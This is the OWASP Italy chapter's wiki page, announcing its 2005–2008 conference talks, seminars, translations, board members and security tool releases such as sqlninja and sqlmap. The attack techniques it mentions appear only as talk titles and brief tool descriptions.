Italy

NEWS: The presentation of the OWASP Day 1 Conference are on-line!
[Here] you can dowload it.

NEXT EVENT:: OWASP Italy at InfoSecurity 2008
5th February: Antonio Parata
 * 14:30 - Costruire Software Sicuro dalle Fondamenta

6th February: Paolo Perego
 * 14:30 - The Owasp Orizon project: internals and hands on

7th February: Luca Carettoni
 * 10:30 - Tu programmi. Io buco.

Here you can read more information about it.

Local Activities
 - Working at the new OWASP Testing Guide! (Matteo Meucci, Alberto Revelli, Stefano Di Paola, Giorgio Fedon, Luca Carettoni, Antonio Parata, Carlo Pelliccioni, Claudio Merloni, Mauro Bregolin) - Translate all OWASP documentations in italian language (Matteo Paolelli, Massimiliano Graziani) - Writing articles about OWASP Project for infosecmag (Matteo Meucci, Alessandro Graziani, Lorenzo De Santis, Marco Graia, Luca Carettoni, Carlo Pelliccioni) - Working at the project OWASP Legal (Dario Vaccaro, Marco Scialdone) - Working at the project OWASP Code Review (Paolo Perego) - Developing WebAppSec tools & Research (Stefano Di Paola, Daniele Bellucci, Alberto Revelli, Antonio Parata, Bernardo Damele) 
 * There is already a qualified group (CISSP, CISA, BS7799 Lead Auditor, OPST, OPSA) of volunteers working on the following tasks:

OWASP-Italy Board
 Founder and Chair: Matteo Meucci Director of Communication: Raoul Chiesa Technical Director : Alberto Revelli R&D Director: Stefano Di Paola Technical Writer Director: Lorenzo De Santis Italian Translation of docs and papers: Matteo Paolelli, Massimiliano Graziani. Official active members: Giorgio Fedon, Luca Carettoni, Antonio Parata, Carlo Pelliccioni, Claudio Merloni, Mauro Bregolin, Paolo Perego, Daniele Bellucci, Bernardo Damele. 
 * This is the (not official) OWASP-Italy Board:

What is OWASP?
Here you can read an interview talking about OWASP.

OWASP-Italy is a CLUSIT Member
http://www.clusit.it/logo_clusit/clusit_logo_b130.gif

Thanks to CLUSIT and OWASP Foundation we have established a cross-membership between the two organizations. So OWASP-Italy is now a CLUSIT member and CLUSIT is an OWASP Educational Member

NEWS: OWASP-Italy at InfoSecurity 07
Here the full article.
 * (Mar 07) Luca Carettoni has published an interview to OWASP-Italy (OWASP interviews OWASP :) )

[Matteo Meucci] [Alberto Revelli] [Antonio Parata] [Paolo Perego] [Carlo Pelliccioni]
 * (Oct 06) ISACA Roma has published several interview with OWASP-Italy members:


 * (Sep 06) Paolo Perego has created the new OWASP Orizon Project. Go to OWASP Orizon Project


 * (Sep 06) Matteo Meucci has been selected as the new editor of the OWASP Testing Guide v2. See OWASP press release and go to OWASP Testing Project v2


 * (Sep 06) Carlo Pelliccioni is writing an article about the analysis of error codes received by web servers.


 * Top10 Vulnerabilities - OWASP-Italy survey:

Alberto Revelli and Matteo Meucci will partecipate as speakers at the seminar: "Web Application Security: guidelines and security auditing for web applications". More info here
 * (21 Jun 06) Infosecurity 2006: the event is organized and managed by the CLUSIT.

CLUSIT has published a book entitled: "La verifica della sicurezza di applicazioni Web-based e il progetto OWASP". Several OWASP-Italy members (R.Chiesa, L.De Santis, M.Graziani, L.Legato, M.Meucci, A.Revelli) have contributed to the writing. The document is now reserved to CLUSIT members, but will be made public in about 3 months.
 * (1 Jun 06) "Quaderno CLUSIT"


 * (31 May 06) Luca Carettoni has published the article "La sicurezza delle applicazioni Web secondo l'Open Web Application Security Project". Hereyou can read the full article.

Thanks to Jim Weiler, Matteo Meucci has presented "Anatomy of two web attacks" at the OWASP-Boston meeting. More info here
 * (1 Mar 06) OWASP-Boston, Microsoft

Thanks to Raoul Chiesa (Director of Communication OWASP-Italy), we will have a great speech at the IDC European IT Banking Forum 2005. Agenda: - New standards for the ICT security auditing in the italian banking scenario: OSSTMM and OWASP. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy and Matteo Meucci, OWASP-Italy Chair - Workshop: unusual form of attacks and banking system violation: live experience. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy
 * (18 Nov 05) IDC - European Banking Forum

SMAU has accepted our submission! More info here
 * (Oct 05) SMAU 2005 is the 42a International ICT & Consumer Electronics Exhibition for Italy.

Thanks to the collaboration with CLUSIT, this doc is available also here.
 * (Giu 05) Thanks to Massimiliano Graziani we have translated in italian the "OWASP Pen Test Checklist v.1.1". You can download it here.


 * (May 05) ISACA Roma Newsletter has published an interview to OWASP-Italy


 * (Apr 05) We have written an article describing the OWASP projects, Web Application Security and the next challenges. ICT Security.(the italian magazine about Information Security) has published the article on the number 33 - April 2005.


 * The presentation of the seminar we have done in ISACA Rome (31th March 2005) is now available here.


 * (Apr 05) We have published a presentation describing a detailed case study of a web application vulnerabilty (MMS Spoofing).


 * (Mar 05) Thanks to Matteo Paolelli we have translated the "OWASP Top Ten Vulnerabilties in Web Application Security" in italian language. You can download it here.

November 30th, 2007 - OWASP-Italy @ Elsag Datamat Security Forum
Matteo Meucci was invited to talk about OWASP Guidelines and SDLC Security at the Elsag Datamat Security Forum 2007 Where: Pescara When: 30th November 2007, h.12.30

October 20th, 2007 - OWASP Italy at SMAU E-Academy 2007
Last 20th October 2007 we had 5 speeches at SMAU E-Academy 2007, here you can download our presentations:

"Dove sono finiti i miei soldi? Internet Banking e Cross Site Scripting" (coming soon)
 * Giorgio Fedon, COO at Minded Security:

"The Owasp Orizon project - bring security at the source"
 * Paolo Perego, Senior Security Consultant at Spike Reply:

"Valutazione del rischio tramite la logica fuzzy" (coming soon)
 * Antonio Parata, Security Consultant at eMaze:

"Anti-Anti-XSS: bypass delle difese del browser"
 * Alberto Revelli, Senior Security Consultant at Portcullis Security:

"Cros-site Flashing! Gli attacchi Web di ultima generazione parlano multipiattaforma" (coming soon)
 * Stefano Di Paola, CTO at Minded Security:

September 10th, 2007 - OWASP Day WorldWide: "Privacy in the 21st Century"


Thanks to the collaboration with the Master on Information Security of the Universita di Roma "La Sapienza", we have organized the OWASP Day here in Italy the last 10th September 2007 during the Global Security Week. The event sponsor was Watchfire:




 * The topic was Web Application Security & Privacy and we had 6 talks: a set technical and a set more at high level.

Here is the Agenda and the presentations:

Start meeting: 9.15

"Welcome and open of the works"
 * 9.15-9.30. Prof. L.Mancini (Director of the Master in Information Security, Università "La Sapienza" Rome):

"Introduction to the OWASP-Day and OWASP-Italy projects"
 * 9.30-9.45 M.Meucci (OWASP-Italy Chair, CEO Minded Security):

"Privacy in the digital era"
 * 9.45-10.15. Mauro Bregolin (Principal Consultant - KIMA Projects & Services):

"OWASP Top 10 2007 - Are our information "really" safe?"
 * 10.15-10.45. Carlo Pelliccioni (Security Consultant - @Mediaservice.net):

"Anti-Anti-XSS: bypassing browser protections"
 * 10.45-11.15. Alberto Revelli (Senior Consultant - Portcullis Computer Security):


 * 11.15-11.45. Coffe break

"Growing Application Security Awareness".
 * 11.45-12.15. Laurent Petroque (F5):

"Buzzwords Security"
 * 12.15-12.45. Luca Carettoni (Security Consultant - SecureNetwork):

"Hacker Attacks on the Horizon: Understanding the Top Web 2.0 Attack Vectors"
 * 12.45-13.30. Danny Allan (Director of Security Research - Watchfire):


 * Here you can download the audio


 * Pictures:




 * Participation: We have received 160 subscriptions!!!

Here you can read about the global OWASP-Day.

May 29th, 2007 - Seminar: "Software Security"

 * Stefano Di Paola, Paolo Perego and Matteo Meucci will talk at the Seminar: "Which approaches to Software Security" organized by Firenze Tecnologia.

May 15th-17th, 2007 - 6th OWASP AppSec Conference in Italy
Here you can find all the details about the conference, cfp and sponsorship.
 * We are in the initial planning stages for the next OWASP Europe conference, which we plan to hold in Italy in May 2007.

April 14th, 2007 - Master on Information Security, University of Rome "La Sapienza"

 * We have done a 4h seminar for the students of Master on Information Security at "La Sapienza" for the Application Security Project of "La Sapienza" University.

March 30th, 2007 - University of Rome "La Sapienza"
Here you can find more details.
 * Thanks to Prof. Mancini and Roberto D'Addario, we will talk about OWASP at the convention "Institutions, Companies and Information Security: comparing the problems"

March 1st, 2007 - EuSecWest 07
Alberto Revelli and Matteo Meucci presented the new OWASP Testing Guide at EUSecWest. Here you take a look at the presentation.

February 6th-8th, 2007 - InfoSecurity
After the great success obtained form CCC at Berlin, Stefano Di Paola and Giorgio Fedon will talk about:" Web Security Client Side: attacks at Web 2.0" More information here.
 * February 6th:15.30

After the great effort on the Testing Guide Project, Matteo Meucci and Alberto Revelli will present: "The new OWASP Testing Guide" More Information here.
 * February 6th:16.30

Authors of innovative SQL injection tools, Alberto Revelli and Antonio Parata will show: "Advanced SQL Injection: testing tools and defensive strategies." More Information here
 * February 7th:12.30

Author of the new OWASP Orizon project, Paolo Perergo will present:"Secure programming: from theory to practice" More Information here.
 * February 7th:13.30

January 25th, 2007 - Isaca Rome
Matteo Meucci will discuss the new OWASP Testing Guide v2 For more information: http://www.isacaroma.it/html/GiornateDiStudio.html

October 7th, 2006 - SMAU 2006
- "The quest for secure code: code review and fundamental of secure coding." Matteo Meucci will present an introduction to the new OWASP Projects and OWASP-Italy activities. Paolo Perego (sp0nge) will speak about safe coding and the importance of code periodic review as natural software life cycle. Paolo will give a vision on code review and its phases http://www.webb.it/event/eventview/5772

Here are the presentations:

- "Advanced SQL Injection." Antonio Parata (S4tan) will explain SQL Injection, and how SQL Inference works on PHP/MySql platform. He will present an open source tool to support the testing. Alberto Revelli (icesurfer) will focus on Microsoft SQL Server: he will perform a live demo of sqlninja (http://sqlninja.sf.net), explaining how to obtain a pseudo-shell over SQL, how to escalate privileges, and how to play with the exotic equation: "SQL Injection + debug.exe + DNS = DOS prompt" ! http://www.webb.it/event/eventview/5774



Luca, Carlo, Alberto, Antonio, Stefano Matteo, Paolo, Giorgio

September 29th, 2006 - OpenExp 2006
September 30th, at 10:45 Antonio Parata (S4tan) will speak about SQL Injection: techniques, tools and practical examples.

Abstract: Antonio will introduce some basic concepts about software security. It will be shown how SQL Inference works on PHP/MySql platform and presented an open source tool to support the testing. Finally will be listed some advises to avoid common bugs. http://www.openexp.it/

OWASP-Italy will have a stand from September 29th to October 1st.



June 21th, 2006 - InfoSecurity 2006
Alberto Revelli and Matteo Meucci will partecipate as speakers at the seminar: "Web Application Security: guidelines and security auditing for web applications". The event is organized and managed by the CLUSIT.

Where: Sheraton Roma Hotel - Viale Del Pattinaggio, 100 When: 10,30 - 17,00 Who: Matteo Meucci and Alberto Revelli Link: http://www.infosecurity.it/Roma/programma.php

Agenda: -- I Session -- Introduction to Web Application Security • Which are the risks? • Risk assessment of a web application • Core pillars of web security How to develop secure web applications: • Guidelines and case-studies

-- II Session -- How to realize a security audit of a web application • The methodology OWASP Penetration Testing • The tools: OWASP WebScarab • Hands-on web application vulnerabilities: OWASP WebGoat • Advanced SQL Injection.

March 1st, 2006 - OWASP-Boston, Microsoft
Thanks to Jim Weiler (OWASP-Boston Chair), Matteo Meucci has presented "Anatomy of two web attacks" at the OWASP-Boston meeting of march. More info here

November 5th, 2005 - IDC - European Banking Forum
Thanks to Raoul Chiesa (Director of Communication OWASP-Italy), we have had a great speech at the IDC European IT Banking Forum 2005 (18 Nov 2005). http://www.idc.com/italy/events/banking05/banking05_agenda.jsp Agenda:
 * New standards for the ICT security auditing in the italian banking scenario: OSSTMM and OWASP. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy and Matteo Meucci, OWASP-Italy Chair
 * Workshop: unusual form of attacks and banking system violation: live experience. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy.

You can download the report here.

You can download the Case-Study of a vulnerable Home Banking Web Application here.

October 5th, 2005 - OWASP-Italy@SMAU2005
SMAU is the 42a International ICT & Consumer Electronics Exhibition for Italy. Alberto Revelli (our Technical Director) and Matteo Meucci have conducted a seminar talking about Web Application Security. Alberto has presented his new project: sqlninja. Very cool!!

http://www.webb.it/event/eventview/4488/1/progetto_owasp__case_study_di_applicativi_web_vulnerabili

May 25th, 2005 - ISACA Rome 2nd meeting
May 25th we'll be in ISACA Rome to present OWASP WebGoat and a real case of a Web Application Vulnerability. Every one is invited to join the meeting.

Here is the agenda: 14.30 Registration 14.45 Matteo Meucci - Web Application Security Phase II - OWASP WebScarab and PenTest Checklist --- Web Application analysis --- Authentication and Billing of the MMS service --- Vulnerabilities --- Attack Analysis --- Http Basics --- HTML Clues --- Hidden Field Tampering --- How to spoof a Session Cookie --- Stored Cross Site Scripting --- Command Injection --- SQL Injection --- Fail Open Authentication
 * A case-study of a Web Application Vulnerability: MMS Spoofing
 * Learning the most common web application vulnerabilities: OWASP WebGoat

The meeting is hold at: Via Volturno, 65 (Rome) - Auditorium ATAC

You can download the presentation here.

May 18th, 2005 - Workshop on Computer Crime 2005
May 18th, 2005 OWASP-Italy is invited to present OWASP Top 10 to the "Workshop on Computer Crime 2005" titled: "EVOLUZIONI NORMATIVE E RECENTI PROBLEMATICHE DI SICUREZZA"

The meeting is held at: Sala delle conferenze dell'Istituto Centrale della Banche Popolari Italiane Via Verziere, 11

You can download the presentation here.

March 31th, 2005 - ISACA Rome meeting
March 31th we'll be in ISACA Rome to present OWASP and the Web Application Security. Every one is invited to join the meeting.

Here is the agenda: 14.15 Registration 14.30 Matteo Meucci - Web Application Security - OWASP Guide: how to build secure web application - How to test your Web Application: WebScarab and the WebApp PenTest Checklist - How to learn the most common web application vulnerability: WebGoat - The Top Ten WebApp vulnerabilities - Common error on developing Web Application: Authentication mechanisms not "secure" Buffer Overflow and crash of the service Thief of identity: Cross Site Scripting Manipulation of company data: SQL Injection Reserved information: misconfiguration Bad session management and thief of identity - OWASP-Italy: projects and next challenges

The meeting is hold at: Via Volturno, 65 (Rome) - Auditorium ATAC http://www.isacaroma.it/html/GiornateDiStudio.html

You can download the presentation here.

March 21th, 2005 - OWASP-Italy conducts a seminar in AlmaWeb
March, the 21th OWASP-Italy has been invited at the University of Bologna to conduct a seminar regards to Master in Management and Information Technology titled “Web Application Security and OWASP”.

Here is the agenda: - OWASP & Web Application Security - Common Web Application Vulnerabilities - A real case of web application vulnerability: MMS Spoofing&Billing - Training: WebGoat

March, 2007 Interview on HTML.it
Luca Carettoni has published an interview to OWASP-Italy (OWASP interviews OWASP :) ) Here the full article.

October, 2006 ISACA Roma interviews OWASP-Italy
After the speeches that OWASP-Italy has done at SMAU E-Academy 2006, ISACA Roma has interviewed some of the people of the Italian chapter. Follow the links for the full interviews (in italian): [Matteo Meucci] [Alberto Revelli] [Antonio Parata] [Paolo Perego] [Stefano Di Paola & Giorgio Fedon]

Aug, 2006 - Article on Banca Finanza magazine
Banca Finanza, the italian magazine about finance and banking, has interviewed Raoul Chiesa talking about the new risks for the on-line banking security. Raoul speaks about OWASP and web application security [[Media:042006BF.pdf]]

June, 2006 - Quaderno CLUSIT
CLUSIT has published a book entitled: "La verifica della sicurezza di applicazioni Web-based e il progetto OWASP". Several OWASP-Italy members (R.Chiesa, L.De Santis, M.Graziani, L.Legato, M.Meucci, A.Revelli) have contributed to the writing. The document is now reserved to CLUSIT members, but it will be public in about 3 months.

June, 2006 - Paper on SQL Injection and Inference on PHP/MySQLInference
Antonio "s4tan" Parata has published an article about SQL Injection based on Inference for testing web application on PHP/MySQL platform. Hereyou can read the full article.

May, 2006 - Published an article about OWASP and Top-10 Vulnerabilities
Luca Carettoni has published the article "La sicurezza delle applicazioni Web secondo l'Open Web Application Security Project". Hereyou can read the full article.

June, 2005 - OWASP Pen Test Checklist v 1.1 in Italian
Thanks to Massimiliano Graziani we have translated in italian the "OWASP Pen Test Checklist v.1.1". You can download it here. Thanks to the collaboration with CLUSIT, this doc is available also here.

May, 2005 - Isaca Roma Newsletter about OWASP-Italy
ISACA Roma Newsletter has published an interview to OWASP-Italy

April, 2005 - Published "MMS Spoofing"
We have published a presentation describing a detailed case study of a web application vulnerabilty (MMS Spoofing).

Jim Hewitt, CISSP PMP working at CGI-AMS, affirms (slide#78): "Very interesting analysis of spoofed cell phone messaging and fraudulent billing". See: www.techvalleynyissa.org/Resources/2005_07_WebApplicationSecurity.ppt

April, 2005 - Published an article on ICT Security magazine
We have written an article describing the OWASP projects, Web Application Security and the next challenges. ICT Security.(the italian magazine about Information Security) has published the article on the number 33 - April 2005.

March, 2005 - OWASP Top-10 in Italian
Thanks to Matteo Paolelli we have translated the "OWASP Top Ten Vulnerabilties in Web Application Security" in italian language. You can download it here.

Nov, 2007 - sqlmap v0.5
Bernardo Damele and Daniele Bellucci have released the fifth versions of the tool sqlmap. sqlmap is an automatic SQL injection tool entirely developed in Python. It is capable to perform an extensive database management system back-end fingerprint, retrieve remote DBMS databases, usernames, tables, columns, enumerate entire DBMS, read system files and much more taking advantage of web application programming security flaws that lead to SQL injection vulnerabilities.

You can download the latest stable version from its SourceForge File List page or the latest development version from its SourceForge SVN repository.

Dec, 2006 - sqlmap v0.2
Bernardo Damele and Daniele Bellucci have released a second version of the tool "sqlmap" for Automatic Blind SQL Injection. Here you can download the tool

September, 2006 - Wisec Project
Stefano Di Paola is developing Wisec - The Wiki Security Project Here you can accesses the project.

July, 2006 - Sqlmap v0.0.1
Daniele Bellucci has developed a first version of the tool "sqlmap" for Automatic Blind SQL Injection. Here you can download the tool